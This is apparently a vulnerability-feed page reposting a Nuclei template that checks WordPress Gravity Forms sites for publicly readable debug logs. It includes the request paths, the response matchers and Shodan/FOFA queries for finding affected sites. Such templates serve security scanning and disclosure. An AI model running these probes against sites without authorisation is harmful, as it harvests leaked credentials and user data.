wp-gravity-forms-log-disclosure: WordPress Gravity Forms - Log File Disclosure

日期: 2026-01-16 | 影响软件: WordPress Gravity Forms | POC: 已公开

漏洞描述

The Gravity Forms plugin for WordPress stores log files that may be accessible without authentication. When logging is enabled, debug and error logs are created in the wp-content/uploads/gravity_forms/logs/ directory. These logs can contain sensitive information including form submission data, file paths, database queries, PHP errors, API keys, and user information.

PoC代码[已公开]

id: wp-gravity-forms-log-disclosure

info:
  name: WordPress Gravity Forms - Log File Disclosure
  author: ritikchaddha
  severity: low
  description: |
    The Gravity Forms plugin for WordPress stores log files that may be accessible without authentication. When logging is enabled, debug and error logs are created in the wp-content/uploads/gravity_forms/logs/ directory. These logs can contain sensitive information including form submission data, file paths, database queries, PHP errors, API keys, and user information.
  metadata:
    max-request: 2
    verified: true
    shodan-query: html:"/wp-content/plugins/gravityforms"
    fofa-query: body="/wp-content/plugins/gravityforms"
  tags: wordpress,wp,wp-plugin,gravityforms,log,disclosure,exposure,misconfig

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/gravityforms/debug.log"
      - "{{BaseURL}}/wp-content/plugins/gravityforms/tmp/debug.log"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'regex("[[0-9]{2}-[a-zA-Z]{3}-[0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2} [A-Z]{3}] PHP", body)'
          - 'contains_any(body, "PHP Warning:", "PHP Notice:", "Undefined array", "Undefined variable")'
        condition: and
# digest: 4a0a0047304502203ee743b1dfba16198d2fb8f894f6389ffe369426f3108845046e723551acb700022100a67dc8f2308aabba5e5d2421138e4eb8a202e67cf7f5ada9161728e94271faaf:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/misconfiguration/wp-gravity-forms-log-disclosure.yaml

相关漏洞推荐